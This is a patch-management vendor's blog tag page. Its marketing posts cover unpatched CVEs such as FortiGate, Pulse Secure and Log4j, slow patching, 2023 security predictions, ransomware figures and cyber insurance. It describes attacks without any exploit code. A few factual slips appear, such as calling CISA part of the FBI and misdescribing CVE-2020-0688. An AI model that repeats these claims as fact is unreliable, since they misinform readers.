TEST

Skip to main content
Tag

Vulnerability

Sloppy CVE Handling Could Mean its Time to Update Your CV – Unless you Bring in an MSP

By BlogNo Comments

There are hundreds of Common Vulnerabilities and Exposures (CVEs) in existence, some more serious than others. All need attention, yet many organizations have gotten sloppy about how they take care of CVEs. Some take months to deploy urgent patches as covered in CVEs. Sometimes in can take years. In a few cases, there are CVEs unresolved in organizations that are more than a decade old.

Those in IT and cybersecurity that are guilty of ignoring or taking far too long to remediate CVEs are advised to either update their CVs and resumes and start sending them out – or bring in an MSP that can completely take care of patch management and vulnerability management. It’s the easy way to ensure no CVEs are unaddressed anywhere in IT systems.

CVEs in Neglect

Let’s take a look at some of the important CVEs that are largely neglected in many organizations. These are only a few examples out of many that could be lurking:

CVE-2018-13379 FortiGate VPNs: The CVE title includes the year of release. This one from 2018 is still being exploited despite regular alerts being issued about it.  Advanced Persistent Threat (APTs) groups continue to use it in attacks. It is such a severe risk that anyone using this VPN without the patch deployed should assume they are now compromised and to begin incident management procedures. Remediation steps include removing these VPNs from service, returning them to factory default settings, reconfiguring them, installing all patches, and once done, returning them to service. An upgrade to the latest FortiOS version is also recommended. Further action indicated is to scan all hosts and networks that are in any way connected to the VPN to look carefully for any signs of malicious activity.

There are also several high-priority patches from 2019 that are often unpatched in enterprise systems:

CVE-2019-19781 about Citrix NetScaler from 2019 has been used to compromise, among others, an Australian defense database.

CVE-2019-11510 relates to Pulse Secure Connect. It can result in arbitrary file disclosure and leaks of admin credentials. This one has been used in attacks via VPNs and by nation-state actors.

CVE-2019-3396 for Atlassian Confluence is a remote code execution bug.

CVE-2020-0688 for Microsoft Exchange. Dating back to early 2020, it leaves server data unencrypted and open to attack. Nearing its third anniversary, it remains a potent vulnerability for the bad guys to exploit.

This is just a partial list. Others that are deemed serious from 2019 include CVEs related to a Cisco router, Oracle WebLogic Server, Kibana, Zimbra software, the Exim Simple Mail Transfer Protocol. When you factor in the CVEs from 2020, 2021, and 2020, the list is very long indeed.

Watch Your Back

Anyone with vulnerabilities and CVEs unpatched dating back more than a couple of months in 2022 should watch their back as they are open to charge of neglecting their cybersecurity duties. Anyone with un-remediated CVEs from 2021, 2020, 2019, or even as far back as 2018 as in the case of FortiGate VPN, could well be soon looking for a new job. They better dig out their CV and get it updated fast.

Before the axe falls, a smart move would be to draft in help from an MSP to help eliminate these vulnerabilities, institute vulnerability management and attack readiness processes, and fully patch all applications, operating systems, and endpoints including mobile devices.

Syxsense offers managed security services for patch management, vulnerability management, and remediation. These services provide real-time, 24-hour security coverage. Syxsense also offers an MSP/MSSP program with a world-class platform. Both are built on the foundation of Syxsense Enterprise, an automated patch management, vulnerability scanning, mobile device management (MDM) and IT management platform. It detects outdated patches and threats in real time and can be used to implement updates before bad actors can take advantage of exploits. Syxsense Enterprise incorporates Zero Trust practices and includes features such as patch supersedence, patch roll back, and a wealth of automation and configuration features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution.

For more information, visit: www.Syxsense.com

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
Syxsense Blog

Long Patching Delays Haunt Enterprise Cybersecurity

By BlogNo Comments

Imagine a kingdom facing invasion from a hostile and determined foe. The citizens band together to build the highest and widest walls possible. They erect battlements, dig deep moats filled with water, forge mighty gates of the strongest metal, and spend countless thousands of hours making sure they are fully secure – only for all to be lost as someone forgot to lock the back gate being used to take out the garbage.

A similar situation is haunting modern enterprise “kingdoms.” Businesses are spending a fortune on cybersecurity – as much as 20% of the overall IT budget. They are deploying intrusion detection and remediation systems, endpoint management technology, Security Information and Event Management (SIEM), threat detection, ransomware prevention, next generation firewalls, Zero Trust Network Access (ZTNA), multifactor authentication (MFA), Secure Access Service Edge (SASE), and a host of other solutions to remain free of breaches. But the entire team is being let down by one little patch that was never deployed on a critical server. Result: the bad guys get in, hold the organization to ransom, extort millions, and live to wreak havoc another day.

This situation is far closer to reality than fairytale in many organizations. Orange Cyberdefense’s Security Navigator 2023 report revealed many startling findings. But by far the most shocking was the state of enterprise patching. Researchers found that businesses are taking an astonishing 215 days to patch a reported vulnerability. Even for critical vulnerabilities, it generally still takes more than 6 months to deploy a patch.

Take the Log4j vulnerability. Originally discovered on 9 December 2021, that means that on average, most organizations hadn’t deployed the many patches released to counter Log4j until July of 2022. How could it be that this vulnerability was labeled by many as one of the most serious that had appeared in years, yet so many chose to ignore the warnings and left the patches gathering dust?

Why So Long to Patch?

What might be the reasons why it could possibly take so long for organizations to deploy urgent patches? Complacency and neglect are certainly factors to consider. Functions like patching and backup are often taken care of as routine and non-emergency duties. Perhaps initially, they are given importance.

New patch management software or services are obtained. Best practices are discussed and implemented. All is well for a while. But over time, these functions receive less and less attention. They are perhaps still done, but fewer eyes are on them, no one bothers to check whether patching was deployed correctly, whether new systems and devices were added to the patching schedule, how long patches took to deploy, or how many patches are currently backlogged.

Testing is another area where organizations can inadvertently cripple patching effectiveness. Once upon a time, they may have suffered some problems due to a glitchy patch that caused downtime. They institute a lengthy and laborious patch testing protocol which, in reality, means that every patch has to go through testing before being sent anywhere. As a result, some patches take an age to be deployed.

There is no time to lose in installing priority patches. Syxsense provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches rapidly across the wire once and then use peer-to-peer within the network for local distribution. This ensures there are no network bottlenecks blocking patch delivery. In the case of a patch or update that causes incompatibilities in other systems, patch roll back features allow you to return systems to the state that existed before the implementation of a new patch.

Lack of Automation in Patching

Lack of automation, too, can dead-end organizational patching. If it remains a manual process, it becomes all too easy for someone to forget to deploy patches or omit transmitting them to half the devices in the network. With hundreds or even thousands of endpoints to manage, lack of automation can delay the implementation of critical patches. Automation saves time as IT no longer has to formulate scripts, hop from one screen to another, or manually push out patches to various destinations.

Additionally, there are factors such as incomplete inventorying of devices and poor reporting. It is one thing to say all systems are patched and fully updated. But it is another to be able to prove it. Comprehensive inventorying and reporting are vital.

Syxsense lets you easily manage unpatched vulnerabilities with the click of a button. It includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides immediate turnaround for the testing and delivery of patches as well as peer-to-peer technology that delivers patches to all devices fast.

For more information, visit: www.Syxsense.com

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

Syxsense Predictions Critical Infrastructure Attacks, More Cyber-Regulation, Faster Zero-Day Exploitation, and Slow but Steady Growth of Zero Trust in 2023

By BlogNo Comments

Jonathan Cassell, Senior Solutions Architect at Syxsense, gazed into the cyber-crystal ball and came up with several predictions for 2023. These include more cyberattacks on critical infrastructure, increased cyber-regulation, faster zero-day exploits, and growing adoption of zero trust, though not at a pace necessary to significantly reduce the quantity of successful cyberattacks.

Here goes:     

Attacks on Critical Infrastructure

2021 and 2022 saw the appearance of serious attacks on critical infrastructure. The famous ones included: The Colonial Pipelines breach that took down east coast fuel supplies for a few days and sent gas prices soaring; and the largest meat processing firm in the world JBS suffering a ransomware attack that disabled beef and pork slaughterhouses and impacted facilities in the U.S. Canada, and Australia. Expect more of the same in 2023, and perhaps even bigger targets getting hit.

More Cyber-Regulation

The FBI’s Cybersecurity and Infrastructure Security Agency (CISA) has had quite a year. It was regularly in the news through issuance of alerts about Common Vulnerabilities and Exposures (CVEs), Shields-Up notifications to guard against Log4j and other threats, and actions taken on a bypass of many enterprises to fix vulnerabilities deemed to be a severe threat. Don’t think that the higher profile of the CISA isn’t going to ripple into other facets of government. Therefore, more cybersecurity legislation is probably on the cards. There is also talk about a potential federal-level privacy regulation similar to the EU’s GDPR.

Regardless of regulatory pressure, insurers are turning the screws on businesses, demanding that they institute stronger cybersecurity safeguards if they want to be given cyber-insurance. Some are being turned down, some given high premiums, and others given less than comprehensive coverage as they were not deemed to have sufficient layers of protection in place.

Faster Zero-Day Exploits

The term zero day relates to recently discovered security vulnerabilities that a vendor or developer has only just learned about. Hence the term – they have zero days left to remediate it. Zero-day attacks are particularly worrying as they can be exploited by cybercriminals before developers have addressed them by issuing patches and figuring out remediation steps. These exploits, therefore, can cause serious damage and data theft until fixed.

When Log4J was discovered, for example, it led to a scramble by a great many vendors and a rash of patches and remediation protocols.

The bad news is that 2023 will probably bring even quicker zero-day exploits leading to shorter time frames between attacks. It may even lead to manufacturers and other victims not discovering such vulnerabilities for longer periods, and not disclosing them promptly either.

Zero-Trust Grows, But Slowly

There is great hope in the cybersecurity community that zero-trust network access (ZTNA) will solve a lot of ongoing difficulties. Certainly, ZTNA is growing and should grow more in 2023. However, we don’t yet see the market traction for it to be deployed widely in enough businesses to make a serious dent in the number of cyberattacks and breaches.

ZTNA encompasses technologies that enable secure access to internal applications. It grants access on a least-privileged basis via granular policy management to give verified users secure connectivity to private applications while protecting the network and avoiding exposing apps to the internet. Thus, Zero Trust is all about securing IT infrastructure and data via a framework that can tackle safeguard remote workers, hybrid cloud environments, and IT in general. It works on the assumption that any network is always at risk of either internal or internal attacks. In essence, Zero Trust means an individual is not just trusted because they are on the network. They must prove who they are and are given only limited access to the systems they need. Beyond safeguarding and vetting individual identities, the next frontier is now verifying machine identities such as the specific device and browser being used for access.

The Syxsense Zero Trust module, part of Syxsense Enterprise, provides hundreds of parameters IT can use to report and act on device compliance. For example, it can determine if a is laptop accessing a NetSuite server after hours from an IP address in an unfamiliar location. If so, it blocks it. It also has the power to enforce compliance with Zero Trust policies prior to granting access on an asset-by-asset basis. And it includes automated remediation of non-compliant endpoints, which could include patching the system, enabling an antivirus tool, and making sure it is up to date on patterns, emailing IT about unauthorized access, and more.

For more information, visit: www.Syxsense.com

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
IT managers device management

How System Administrators and IT Managers Can Get More Sleep

By BlogNo Comments

Those working in IT grow accustomed to pagers or smart phones going off in the middle of the night. That means they must get dressed, grab a quick coffee, and head into the office to resolve the latest security alerts, server outages, or network glitch. It can happen on weekends, too. Instead of a relaxing lie in bed for some much-needed hours of extra slumber, an alert comes in – or it happens during precious leisure hours with family and friends. The IT staffer must pack up the beach towels or turn off the barbeque or the game, kick off the flipflops, and take that long commute the work.

By deploying Syxsense for automated patch management, mobile device management (MDM), vulnerability scanning, IT management, and remediation, IT personnel can greatly increase their number of hours of undisturbed sleep AND feel far less resistance about meeting each new day. Here’s how:

Morning Slumbers

A fascinating study by Best Mattress Brand revealed that the job one does and the industry worked in have a definite influence on the number of minutes people lie in bed after the alarm sounds. Regardless of the time you need to be at work, you’re going to set an alarm depending on how long it takes you to get up, get ready, and get to your workplace. These times are often influenced by factors such as the stress one has to endure, the type of responsibility each person has, and the way each one of us decides to face the day ahead.

Those who stay in bed the least seems to be working in transportation and warehousing (8 minutes), homemaker (8 minutes), construction (7 minutes) and manufacturing (7 minutes). Medical and healthcare, finance and insurance and IT all stand at an average of 11 minutes of lying in bed after the alarm, while government and public administration, education and wholesale and retail workers take in average 10 minutes.

The study found that job satisfaction was somewhat correlated to the length to time people want to linger in bed. Those the least happy at work tended to lie in bed for around 11 minutes – the same as IT.

Certainly, there may be other factors. Nevertheless, all those late night and weekend alerts, and the intense stress of working in a stressful malware-saturated environment seem to be taking their toll on system administrators and IT managers. They either want to remain in bed a few extra minutes to make up for lack of sleep, or they stay under the covers longer as they try to muster the courage to face another hectic day of ransomware threats, phishing alerts, and data breaches.

Syxsense Can Help You Get More Sleep

Experts say sleep is as important for good health as diet and exercise. A good night’s sleep improves brain performance, mood, and health. Not getting enough quality sleep regularly raises the risk of many diseases and disorders.

Syxsense is a sure way for system administrators, IT managers, and cybersecurity personnel to get more sleep, improve their mood, and improve productivity. It automates the entire process of patch management, vulnerability scanning, and mobile device management (MDM). As it protects organizations from breaches by blocking users on untrusted devices, it helps organizations create a security posture that encompasses the various criteria necessary to be granted trusted access. It can also automatically apply fixes and remediate issues in real time to enable proper access. Remediation actions might include deploying an urgently needed security patch, updating the anti-virus signature database, and alerting IT about unauthorized access attempts.

By deploying Syxsense Enterprise, IT personnel gain peace of mind. They get go to bed at night confident that they are extremely unlikely to be distributed by the strident sound of a pager. They can engage in activities with family and friends at the weekend without the specter of yet another interruption due to the latest emergency. By sleeping better, they can wake up refreshed and increase their level of happiness and job satisfaction.

For more information, visit: www.Syxsense.com

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
syxsense scores high in gigaom report

Syxsense Scores High in GigaOM Patch Management Report

By BlogNo Comments

Vendors often fight over whose solution is best. They set up their own tests to prove that they are better than the competition. Unfortunately, vendor sponsored tests sometimes include a certain bias. Say vendor X knows its software works well a specific volume of traffic running application A and that a competitor’s solution doesn’t perform as well on that specific workload. The test can be rigged to focus on those parameters. Hey, presto! Vendor X scores much better than its rival “proving” its superiority.

Hence, it is always best to look for independent evaluations of different products with no bias of any kind (such as vendors sponsoring the study). Research firm GigaOM operates in this way. Its studies are done in a way to maintain objectivity.

Recently, GigaOM evaluated 18 patch management vendors to determine which solutions were the strongest. That put Syxsense up against some long-established giants such as Ivanti, BMC, and Tanium that are more than ten times our size. The analyst firm graded Syxsense as a Leader in patch management and a Fast Mover in a challenging marketplace.

This high rating came about due to the breadth and depth of the Syxsense offering when it comes to identifying, acquiring, verifying, and installing patches to physical and virtual devices, and software systems. GigaOM analyst Ron Williams carefully looked into areas such as patch characterization, prioritization, testing, implementation tracking, and verification to determine the robustness and comprehensiveness of each patch management solution. He checked the range of operating systems (OSs), applications, and environments they can work with.

How Syxsense was Graded

Syxsense gained an outstanding rating from GigaOM for all market segments: small & midsized businesses (SMBs), large enterprises, and as something service management service providers (MSPs) can use to provide patch management to their clientele.

While some vendors specialize in one OS or one environment and some don’t have the ability to patch mobile devices, Syxsense performed well in GigaOM tests due to its extensive range of coverage. As well as Syxsense, only other two other vendors out of 18 were given an outstanding rating against all areas of patch coverage: desktop and server Windows and Linux, desktop macOS, mobile, and remote systems.

GigaOM makes particular use of what it calls its key evaluation criteria to compile these detailed comparison reports. Syxsense was graded by the analyst firm as being very capable in inventorying, tested sources and patching architecture, and outstanding in lifecycle management, patch testing, patch deployment, path prioritization, and patching of third party and in-house applications. Further, when graded against the evaluation metrics of flexibility, management capabilities, resource load management, security, usability, and patch reporting, Syxsense came as outstanding on all categories. No other solution scored higher on these metrics.

GigaOM’s Opinion of Syxsense

Beyond its Leader and Fast Mover rating, GigaOM went into detail about how Syxsense patch management fared during the evaluation process. It explained that the company’s customers range from 100 to 100,000 endpoints and that the platform consists of a larger set of tools focused on intelligent (AI-based) endpoint management. With full coverage of Windows, macOS, and Linux desktops and servers, as well as mobile devices and remote systems, Williams stated:

“Syxsense provides a strong patch management solution, especially when the rest of the portfolio is considered. It covers all identified patching targets. Its strengths lie in lifecycle management, patch testing, patch deployment, patch prioritization, and a large number of third-party applications. Syxsense also supports an API, allowing integration with other systems such as ITSM and CMDB.”

In terms of challenges, he noted that Syxsense uses only a trusted repository of vendors. In Williams opinion, this disallows the use of distributed repositories and may present a bottleneck when a large number of endpoints are patched in the same physical location, though there are methods to mitigate this issue. Syxsense addresses the patch deployment bandwidth challenge by intelligently distributing applications and patches without tying up bandwidth across the enterprise. This is accomplished using technology that sends software and patches across the wire once, using peer-to-peer within the network for local distribution.

You can find out more about it and download the report here:

Syxsense Named a Fast Mover in GigaOm Radar Report for Patch Management Solutions

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
endpoint security

2023 Predictions from the Endpoint Security Experts

By BlogNo Comments

Ashley Leonard, CEO of Syxsense, provides his thoughts on the world of cybersecurity and what to expect in 2023. He touches on diverse areas such as Zero Trust, artificial intelligence (AI), cloud-based attack vectors, autonomous endpoints, and the vital need for orchestration and automation in security.   

Zero Trust Comes of Age

Zero Trust has been a huge buzzword in 2022. However, the actual application of Zero Trust technology within corporate infrastructure has been limited. According to Dell’s Global Data Protection Index, only 12% of large organizations have implemented a Zero Trust architecture, though 91% say they are either aware of or are planning to deploy it soon.

My prediction for 2023, therefore, is that we will finally see Zero Trust concepts implemented broadly within corporate IT environments. Accordingly, we have added a new Syxsense Zero Trust module within Syxsense Enterprise that enables endpoint compliance with Zero Trust Network Access policies (ZTNA). It serves as an organization’s “Trust Evaluation Engine” for endpoints, offering and control over network access policies, and enables security teams to build sophisticated access policies and remediation workflows to ensure ZTNA compliance.

AI Brings Both Good and Evil

Another technology that has been talked up for years yet has somewhat limited implementations is AI. My prediction for 2023 is that we will see an AI arms race, with both the good and the bad guys utilizing AI far more heavily.

The good guys will harness it in many way: for real-time threat monitoring; to add more even power and speed to patch and vulnerability scanning; and to coordinate logs and data sources across the enterprise in real time to spot the patterns that indicate a Distributed Denial of Service (DDos) attack, a phishing outbreak, compromised accounts, ransomware, or data breaches. AI will take security systems to a higher level of pace, sophistication, and capability. And it is coming just in time.

Why? The bad guys are harnessing AI, too. They are using it to find ripe ransomware targets, to figure out the best attack vectors that will bring the biggest payout, and to assess the potential worth of targets automatically. For example, it is well known that Common Vulnerabilities and Exposures (CVEs) scored 8 and above are given high priority for patching and remediation in many businesses. AI is being used to figure out combinations of low and high priority CVEs to find the easiest way into a business. By beginning with a 6 or 7-rated CVE, cyber gangs known that some of these patches might not be deployed in many organizations. From there, they can enter and then exploit more serious vulnerabilities. The morale is clear: Patch all your system religiously and perform regular vulnerability scans.

Cloud Attacks Multiply

As many IT departments have moved critical business functions to the cloud such as those for email, accounting, and customer relationship management (CRM), this has resulted in the cloud becoming a bigger attack target. My prediction is that we will see a major increase in cloud security breaches in the coming year.

Data from Microsoft shows Azure deployments rising at a rate of 33% a year. Cybercriminals know this, and they have realized that enterprises often have a blind spot when it comes to cloud security. Some businesses think the cloud provider is responsible for the protection of their data when it is actually their own responsibility. The cloud provider is only responsible for the integrity of its own cloud infrastructure. Hence, cloud breaches are common and they are going to become even more frequent until cloud data security is prioritized.

Autonomous Endpoints

In recent years, there has been tremendous focus on the cloud as a way to centralize compute and storage resources. This has certainly been a great leap forward. But think about it for a moment. Businesses possess incredibly powerful processors inside storage equipment, servers, and desktops. These systems are underutilized in many cases. A prediction for 2023 is that many of the tasks managed today by the cloud could be better performed at the endpoint – and we will begin to see some functions decentralized onto endpoints to take advantage of this untapped compute potential.

More Orchestration and Automation

IT departments can expect to be stretched to the limit in 2023 as inflation and a global recession put additional pressure on IT budgets. Hiring freezes are likely in some quarters. IT will be told yet again to do a lot more with fewer people. The only way to survive in such a climate is to add more orchestration and automation capabilities. Expect, therefore, that orchestration and automation technologies we be more heavily used in the coming year to enable IT to maintain security and service.

Syxsense offers automated patch management, vulnerability scanning, mobile device management, remediation, and IT management in one integrated suite. This enables IT to orchestrate a great many functions from one console, eliminating manual labors that can easily consume many hours.

For more information visit www.Syxsense.com  

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
cybersecurity

Don’t Get Complacent about Log4j

By BlogNo Comments

The Log4j vulnerability burst onto the scene in December of 2021. One cybersecurity firm reported that the flaw was utilized in attacks on more than 40% of global networks, and that more than 100 breach attempts utilized it every minute when it first came out. At the time, the director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said it posed a severe risk and was perhaps the most serious threat she had seen in her lengthy career. No wonder government agencies panicked. All civilian federal agencies were ordered to immediately fix this vulnerability. Vendors, too, were concerned, rushing out a series of patches. There were dozens of patches to deploy related to Log4j.

A year on from the initial turmoil occasioned by this zero-day threat, where do we stand? Log4j continues to be exploited. After so many patches were made public by so many vendors, there are still plenty of organizations that have failed to install them. No wonder cybercriminals continue to enjoy success with this potent vulnerability.

Log4j Fundamentals

Log4j allows hackers to perform such things as remote code execution and to be able to access servers. They can use the Java logging library to deliver crypto-mining malware, steal usernames and passwords, access other systems, or cause a local denial of service condition.

Part of the problem for the continuing menace posed by Log4j is that it is embedded in almost all Java-based products or web services. In fact, it is so deeply embedded in Java-based systems that it is proving difficult for IT to find all the versions of it that may be running within its infrastructure, applications, or in the cloud. Hence, it is quite common for some IT departments to believe that they took care of it completely. Yet the reality is that they only dealt with the obvious places where it resides.

Beyond IT systems, Log4j is also heavily used in Supervisory Control and Data Acquisition (SCADA) systems and historian systems within many industrial and infrastructure systems. As these systems often have dependencies on other systems, cybercriminals can potentially use them to infiltrate the enterprise.

Another factor in the scary nature of Log4j is that vulnerable systems could be compromised due to many systems having code that uses this vulnerability to log information an application received from external sources. Hackers could take advantage of this simply by typing malicious text into a web application field, for example. The more creative among cyber-attackers have even been able to leak runtime and environment variables such as API keys or other credentials. And as Java can be used to send code over a network, code execution became possible on a remote basis.

For those wanting more information, the open-source Log4j Java logging component problem was eventually was broken into four vulnerabilities known as CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. These CVEs offer plenty of data on the bug, where to find it, and its various remedies.

Good News and Bad News

The good new news is that Log4j attacks have been trending downward throughout 2022. But organizations cannot relax. The bad news is that there has been evidence of surges in its use by cybercriminals of late. One happened in June and another in August. The latter one saw Log4j playing a part in several high-priority security incidents.

Enterprises are advised, therefore, to check, check, and check again to ensure they have eradicated this problem completely from any and all systems.

CISA issues a series of recommendations for organizations to fix Log4j. Among these, where points such as:

     1. Enumerate any external facing devices that have Log4j installed.

   2. Download all relevant vendor patches for the applications and operating systems at use throughout the enterprise. Patches are available from Microsoft, IBM, Adobe, Cisco, VMware, and many other vendors to remedy Log4j.
3. Patch them all using an automated patch management system.

Those kinds of actions may require extensive inventorying and patching of enterprise systems. Syxsense can help businesses discover all impacted endpoints, devices, and systems and deploy fully tested patches to wherever they are needed rapidly. Its automation features will save IT departments a great many hours, if not days, when it comes to once and for all dealing with the Log4j scourge.

For more information visit www.Syxsense.com  

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

Rampant Ransomware and Data Breaches + Lack of Cybersecurity Talent = Surging MSSP Demand

By BlogNo Comments

A casual glance at the headlines is far from reassuring concerning the state of enterprise security. Whether it is the billions being paid out to criminal gangs, the millions of customers whose personal data was hacked, or the latest vulnerability impacting IT systems, the bad news keeps piling up. And with organizations unable to fill urgent cybersecurity jobs – or even entry level positions – the situation looks grim.  

Managed Security Service Providers (MSSPs), though, view these developments in a different light. They see these megatrends as a sure sign that the MSSP market is going to remain health for the foreseeable future. Organizations need all the cybersecurity help they can get.  

Let’s summarize some of the latest malware and cyber-staffing shortage headlines:  

Massive Payouts  

Many wait with bated breath to see if their winning ticket comes up in Powerball. A recent jackpot exceeded a billion dollars. But cybercriminals look for a different kind of winning ticket – holding organizations to ransom. In the U.S. alone, banks processed $1.2 billion in ransomware payments in 2021, according to a report from the Treasury Department’s Financial Crimes Enforcement Network. That’s almost triple the amount from 2020 and the total could be even higher in 2022. With a war happening in Ukraine and Russia under heavy sanctions, the fact that much of this money is filtered through suspected Russian cyber hackers means that some of that cash may be subsidizing the Russian military. Stopping ransomware in its tracks, therefore, is a matter of national as well as organizational security. 

Who is making the biggest payments? The manufacturing industry leads the way, with the average ransom payment being around $2 million, according to a Sophos study. These businesses probably considered that amount to be a modest penalty in comparison to the millions they would lose each week by having their systems shut down. This may be one of the reasons why manufacturing ransom averages are more than double that of the broader business world. Cyber criminals know this. They want to target companies that incur big daily losses due to a ransom attack. Manufacturers not only fit the profile; they are also laggards when it comes to security and digital transformation. Many of them cling to aging and highly insecure systems. And with the worlds of IT and operational technology (OT) coming together, ancient OT systems are now heavily exposed.  

Overall industry averages show that 37% of those paying ransoms handed over more than $100,000. But as many as 8% paid $1 million or more to be given their decryption keys. Not surprisingly, almost two thirds of those paying failed to recover all their data.  

Insider Threats  

Ransomware is huge. But insider threats, too, are becoming a major issue. Kroll’s Q3 Threat Landscape: Insider Threat the Trojan Horse of 2022 report highlights the rise of insider threats in the enterprise. They accounted for 35% of all unauthorized access threat incidents.  

Further findings:  

  • A big increase in phishing, particularly via valid accounts 
  • More malware infections via USB 
  • A decrease in overall ransomware attacks as criminals focus on the most lucrative targets  
  • An increase in credential stealing malware such as Ursa, Vidar, and Raccoon 
  • A rise in attacks against professional services and manufacturing firms 
  • An increase in phishing attacks, specifically vishing and smishing attacks in which threat actors attempt to gain valuable personal information for financial gain through phone calls, voice altering software, text messages, and other tools. 

The Sad State of Government Security  

In light of these challenges, the federal government has taken major steps to safeguard its systems. Yet breaches continue and ransomware is running rampant.  

  • Between 2018 and October 2022, 330 individual ransomware attacks were carried out against US government organizations, potentially impacting more than 230 million people and costing an estimated $70 billion in downtime alone.
  • Ransomware amounts varied from $1,000 to $5.3 million 
  • Hackers demanded nearly $36.5 million (72 ransom amounts were revealed) 
  • Hackers received $5 million in payments from 27 of those 72 cases 
  • Ryuk, Sodinokibi, DoppelPaymer, and Conti were the most prolific hackers (where the entity disclosed the hacker name or the hacker claimed responsibility for the attack) 
  • Texas had the highest number of attacks (35) and the greatest number of people impacted (72.5 million), followed by Georgia with 25 attacks and 23.9 million people potentially affected. Making up the rest of the top five most affected states were California (19 attacks), Florida (18 attacks), and Pennsylvania (14 attacks)

Should We All Quit?  

In response to such alarming reports, it is no wonder that many cybersecurity executives are throwing their hands up in despair. Some want to quit altogether. A better solution is to bring in outside help. MSSPs can share the burden with enterprise IT and help solve the staffing and ransomware crises. Security duties can be handed off to MSSPs such as vulnerability management, endpoint detection and response (EDR), backup and recovery, and even Security Operations Center (SOC) services.  

Syxsense offers managed security services for patch management, vulnerability management, and remediation. These services provide real-time, 24-hour security coverage.  Syxsense also offers an MSP/MSSP program with a world-class platform that features an orchestration and automation engine to scale business without adding costs. 

For more information visit www.Syxsense.com  

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

Cyber Insurance Rates Climb & Refusals Multiply

By BlogNo Comments

The insurance industry is in somewhat of a crisis. Home insurance rates have climbed. Providers are pulling out of the market in some parts of the country. Flood insurance, too, is a major issue. It is mandated in many coastal and floodplain areas, yet insurance carriers are often reluctant to award it due to the risk of high-volume payouts.  

Similarly in cyber insurance, premiums are rising sharply. Some companies are even being told they don’t qualify (or no longer qualify). A survey by Delinea of 300 US-based IT decision makers revealed one of the reasons for the challenges many face in obtaining affordable cyber insurance: nearly 80% of companies have had to use their cyber insurance at least once already, and more than half have used it multiple times. 

While 40% said risk reduction was the main reason for applying for cybersecurity insurance, and 33% of respondents claimed it was also due to requirements from executive management and Boards of Directors. Another 25% cited recent ransomware incidents as a primary decision driver. Other drivers behind applications for cyber insurance included business contract requirements (24%) and having suffered a data breach (17%).  

The report also demonstrated that cyber insurance has now become ubiquitous. Many companies have leveraged coverage more than once. That’s one of the reasons why the insurers are becoming more hesitant and choosier. They are covering less, asking for more, and making it more difficult for companies to receive comprehensive coverage. Only 30% of organizations confirmed their policies covered critical risks such as ransomware, ransom negotiation, and decisions on ransom payment. About 48% indicated their policy covered data recovery. A third said it covered incident response, regulatory fines, and third-party damages. 

Tough Requirements  

The report highlighted the fact that insurers are getting tougher to please. More and more, they require organizations to implement a broader set of security controls. By forcing organizations to adopt tougher layers of security, they seek to reduce the number of customers needing payouts from their cyber-policies. 51% said their insurer required that they implement cybersecurity awareness training and another 47% were required to have malware protection, antivirus software, multi-factor authentication (MFA), and to comprehensively backup their data. 42% had to acquire Privileged Access Management solutions to meet cyber-insurance requirements.  

 

Although about 93% of applicants are approved for coverage, the number receiving comprehensive coverage for everything has dwindled sharply. Gone are the days when insurers happily signed off on wide-ranging coverage. They got burned too much by surges in the number of claims due to the latest strain of malware such as Log4j or the latest rash of ransomware outbreaks. That’s one of the big reasons why 75% of respondents said that their cyber-premiums increased in their last renewal. 

Not only were their monthly payments hiked up, but they also faced far greater scrutiny from potential insurers. They wanted to know every detail of their security posture, their risk profile, and areas of potential vulnerability. Some of this was used as grounds for refusal of cyber insurance. In other cases, these assessments by insurers led to demands to implement a variety of different security tools.  

Any prospective cyber insurance policy holder, and anyone coming up for renewal, therefore, is advised to carefully assess their security basics before applying. Things like lack of comprehensive backup, inadequate patch management, and a lack of vulnerability management tools could form immediate grounds for refusal.  

Get ahead of the game by implementing Syxsense Enterprise. It provides automated tools to help meet the standards required by cyber insurance providers. It offers access to real-time data and device monitoring so security personnel have access to live, accurate information on the existing security picture, potential vulnerabilities, the state of patch management, mobile device security, and more. It helps IT to keep BYOD and company-issued devices secure from threats in remote, hybrid, or roaming work models. And it provides a way to enforce security standards, install and delete applications, set auto update policies, deploy patches automatically, and remotely lock, reset, and wipe mobile devices. It also helps satisfy underwriter demands for higher levels of automation in the enterprise before they approve new cyber insurance policies.  

Why face steeper premiums or even cyber insurance rejection? Implement Syxsense Enterprise today.  

For more information visit www.Syxsense.com  

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
ransomware

DDoS Eclipses Ransomware as a Major Threat

By BlogNo Comments

A recent Threat Pulse research report from NCC Group found that the highest number of Distributed Denial of Service (DDoS) incidents between January and September 2022 took place in the month of September. This represented a 14% increase and a total of 2,090 DDoS attacks. Ransomware attacks, meanwhile, were down 7% from the previous month with Lockbit 3.0 (30%), Black Basta (13.3%), and BlackCat (12.8%) remaining the most prevalent threat actors. Lockbit has been the most active group for every month of the year.  

